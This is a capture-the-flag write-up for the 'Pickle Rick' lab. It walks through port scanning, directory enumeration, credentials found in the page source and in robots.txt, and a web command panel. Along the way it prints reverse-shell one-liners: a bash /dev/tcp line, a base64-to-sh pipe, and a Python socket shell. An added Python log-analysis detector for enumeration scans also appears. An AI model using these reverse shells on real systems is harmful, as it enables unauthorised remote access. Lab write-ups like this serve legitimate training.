Pickle Rick

A Rick and Morty CTF. Help turn Rick back into a human!

This Rick and Morty-themed challenge requires you to exploit a web server and find three ingredients to help Rick make his potion and transform himself back into a human from a pickle.

You have to answer three questions (flags) to fully complete this room:

  1. What is the first ingredient that Rick needs?

  2. What is the second ingredient in Rick’s potion?

  3. What is the last and final ingredient?

Enumeration

$ nmap -sV -sC <IP>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 21:d4:44:b1:43:e3:a2:ca:51:b6:2f:dd:5a:ff:45:98 (RSA)
|   256 51:57:da:91:fd:9c:38:ec:24:b2:21:d7:f5:e0:cf:69 (ECDSA)
|_  256 68:dc:d7:0b:94:e6:c4:d1:62:ca:8b:a1:c2:d1:e9:6d (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let's check port 80 in our browser.

Main page when visiting IP on port 80

Let's check the source code of the page for anything left behind.

Source code for the page

We've found Rick's username; now we need a password. Let's check /robots.txt and see what we find:

Wubbalubbadubdub

This could be a password. Let's try logging in via SSH with this combination:

Username: R1ckRul3s
Password: Wubbalubbadubdub

However, when attempting to access via SSH, we receive the following error:

$ ssh R1ckRul3s@<IP>
R1ckRul3s@<IP>: Permission denied (publickey).

The server only accepts public-key authentication, so the password is of no use over SSH and we need to find another place to use these credentials. Let's use gobuster to search for something, maybe a login page.

gobuster dir -w /home/kali/Documents/Hacking_stuff/SecLists/Discovery/Web-Content/combined_words.txt -u <IP>

===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200)
/robots.txt           (Status: 200)
/.                    (Status: 200) 

gobuster dir -w /home/kali/Documents/Hacking_stuff/SecLists/Discovery/Web-Content/Logins.fuzz.txt -u <IP>  
===============================================================
/login.php            (Status: 200) 
/?page=admin.auth.inc (Status: 200) 
/?page=auth.inc.php   (Status: 200) 
/?page=auth.inc       (Status: 200) 
===============================================================

Let's try opening the login page to see if the credentials we found are correct.

From here, we find a control panel that allows us to execute commands directly on the system.
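
Seen from the server side, the gobuster runs above leave a distinctive trace in the Apache access log: one client requesting many distinct paths within seconds, almost all answered with 404. The following detection sketch is an added example, not part of the original write-up; the log lines, client addresses and thresholds are constructed, and it assumes Apache's combined log format.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def parse(lines):
    """Yield (ip, time, path, status, user_agent) for each well-formed line."""
    for line in lines:
        m = LINE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield m["ip"], ts, m["path"], int(m["status"]), m["ua"]

def find_enumeration(lines, window=timedelta(seconds=60), min_paths=20, min_404_ratio=0.8):
    """Flag clients that request many distinct, mostly missing paths within one window."""
    by_ip = defaultdict(list)
    for ip, ts, path, status, ua in parse(lines):
        by_ip[ip].append((ts, path, status, ua))
    alerts = {}
    for ip, hits in by_ip.items():
        hits.sort(key=lambda h: h[0])
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1  # slide the window forward
            span = hits[start:end + 1]
            ratio = sum(h[2] == 404 for h in span) / len(span)
            if len({h[1] for h in span}) >= min_paths and ratio >= min_404_ratio:
                # Report what the scan actually located (200s), which is what needs review.
                alerts[ip] = {"found": sorted({h[1] for h in hits if h[2] == 200}),
                              "user_agents": sorted({h[3] for h in hits})}
                break
    return alerts

def sample_log():
    """Constructed sample: one wordlist scan and one ordinary browser session."""
    fmt = '{ip} - - [10/Mar/2024:12:00:{s:02d} +0000] "GET {p} HTTP/1.1" {c} 512 "-" "{ua}"'
    words = [f"/word{i}" for i in range(30)] + ["/robots.txt", "/login.php", "/?page=auth.inc"]
    scan = [fmt.format(ip="10.10.14.7", s=i, p=p, c=200 if "." in p else 404, ua="gobuster/3.6")
            for i, p in enumerate(words)]
    browse = [fmt.format(ip="10.10.20.5", s=i, p=p, c=200, ua="Mozilla/5.0")
              for i, p in enumerate(["/", "/index.html", "/login.php"])]
    return scan + browse

if __name__ == "__main__":
    for ip, info in find_enumeration(sample_log()).items():
        print(ip, info)
```

The rule keys on request behaviour rather than the User-Agent string, since the latter is set by the client; the agent is reported only as context for the analyst.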

Foothold

We can try to print the content of clue.txt or Sup3rS3cretPickl3Ingred.txt. However, trying to run cat shows us the following screen.

At this point, let's try to directly obtain a reverse shell. None of the following methods seem to work.

/bin/bash -c 'bash -i>&/dev/tcp/<myIP>/<myPORT> 0>&1';
echo "<PayloadBASE64>" | base64 -d | sh

After checking for Python3 on the device, let's try the following method:

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("<myIP>",<myPORT>));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'

Listener on the local machine and obtaining the reverse shell

Privilege escalation

Check the current user's privileges using the command

Checking privileges and obtaining root

We have successfully gained root privileges. Now, by searching under /home, we will find Rick's folder containing the second ingredient inside the file second ingredients. Under /root, we will find the third and final ingredient, contained in the file

We've finally pwned this machine🥒🚩